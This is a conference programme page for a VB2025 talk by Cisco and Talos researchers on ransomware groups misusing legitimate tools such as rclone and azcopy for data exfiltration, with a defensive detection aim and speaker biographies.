Wednesday 24 September 11:20 - 11:50, Red room
María José Erquiaga (Cisco), Darin Smith (Talos), Robert Harris (Cisco), Raymond McCormick (Talos) & Josh Pyorre (Talos)
Ransomware groups increasingly leverage legitimate tools to carry out data exfiltration during double extortion attacks. These tools are typically divided into three categories: native operating system utilities (e.g. xcopy, robocopy), third-party applications (e.g. rclone, syncthing), and cloud-based tools (e.g. Azure CLI, azcopy, gcloud). Their legitimate nature and widespread use make them ideal for stealthy operations, allowing attackers to reduce the likelihood of detection while transferring large volumes of data.
This research focuses on analysing the misuse of these trusted tools by ransomware actors. We study usage trends, command-line patterns, associated network ports, and exfiltration techniques across various ransomware campaigns. Our analysis includes both publicly documented cases and practical experimentation, enabling a detailed understanding of how these tools are configured and deployed in real-world scenarios. Through statistical and behavioural analysis, we identify patterns that can inform the development of more effective detection strategies. Examples include the frequent use of specific flags or commands, correlations with network activity, and timing of exfiltration events. We also categorize tools based on their likelihood of abuse and visibility within an enterprise environment.
The results of this work will be shared as an open-access matrix, similar in spirit to the C2 Matrix project, enabling defenders and researchers to reference known tool behaviours and integrate this knowledge into their detection systems. By doing so, we aim to bridge a current gap in the literature and provide actionable insights to enhance cybersecurity defences against modern ransomware threats.
![]() |
María José Erquiaga María José Erquiaga is a cybersecurity professional currently working as a threat researcher at Cisco. Her work focuses on threat intelligence, cloud security research, and detection engineering. She analyses adversary behaviours on network, endpoint and cloud domains and develops native detections for Cisco XDR. María has presented at conferences such as Botconf, Black Hat Europe, and DEFCON. She holds a Master's in high performance computing from the University of La Plata and a Professional Bachelor's degree in wireless networks and security from the University of Rennes 1 (IUT Saint-Malo, France).
|
Darin Smith Darin leads a threat research team within Cisco Talos focused primarily on cloud native research & detection engineering. He has previously worked in threat hunting at Amazon and digital forensics at the US Federal Bureau of Investigation. He holds an M.Sc. from Kings College London and a B.Sc. from the University of California, Davis.
|
|
Robert Harris Robert Harris is the Detections TME for Cisco Secure Network Analytics and Cisco XDR. He formerly worked as a security researcher in the Counter Threat Unit (CTU) at Secureworks, and now builds new NDR detections at Cisco. Outside of work, Robert helps run a large pet rescue and enjoys the outdoors with his personal and foster dogs.
|
|
Raymond McCormick Raymond McCormick, a cybersecurity expert at Cisco, provides cloud research and detection engineering capabilities. With a B.Sc. in computer science, he started as an active-duty military member, working on communications and DoD networks. He transitioned to cybersecurity, supporting threat modelling and incident response for government operations and supporting JFHQ DoDIN and USCYBERCOM.
|
|
Josh Pyorre Josh Pyorre is a security researcher with Cisco Talos. He has been in security since 2000, having worked at NASA, Mandiant, OpenDNS, ZScaler, and at various non-profits. Josh has presented at DEFCON, B-Sides, Derbycon, DeepSec, Qubit, Infosec world, RSA, BlackHat, and more. His professional interests involve network, computer and data security with a goal of maintaining and improving the security of as many systems and networks as possible. His website is https://pyosec.com |
Back to VB2025 conference page